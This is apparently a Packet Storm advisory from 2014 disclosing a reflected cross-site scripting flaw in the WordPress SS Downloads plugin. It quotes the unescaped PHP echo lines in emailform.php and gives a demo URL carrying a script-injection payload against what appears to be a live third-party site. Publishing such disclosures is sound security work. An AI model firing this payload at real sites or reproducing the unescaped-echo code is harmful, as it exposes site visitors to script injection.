WordPress SS Downloads Cross Site Scripting

2014-01-26T00:00:00
ID PACKETSTORM:124958
Type packetstorm
Reporter ACC3SS
Modified 2014-01-26T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress SS Downloads Plugin Cross Site Scripting  
  
# Exploit Author : ACC3SS  
  
# Vendor Homepage : http://wordpress.org/plugins/ss-downloads/developers/  
  
# Software Link :  
http://downloads.wordpress.org/plugin/ss-downloads.1.4.4.1.zip  
  
# Date : 2014-01-19  
  
# Tested on : Windows 7 / Mozilla Firefox Web Browser  
  
# Discovered by : ACC3SS  
  
######################  
  
# Vulnerability code : emailform.php  
  
$file = $_REQUEST['file']; & <?php echo $file; ?>  
$title = $_REQUEST['title']; & <?php echo $title; ?>  
$postid = $_REQUEST['postid']; & <?php echo $postid; ?>  
  
######################  
  
# Location :  
localhost/wp-content/plugins/ss-downloads/templates/emailform.php?file=[Xss]  
  
######################  
# Demo :  
  
#  
http://aquarts.de/wp-content/plugins/ss-downloads/templates/emailform.php?file=  
"/><script>alert(1);</script>  
######################  
`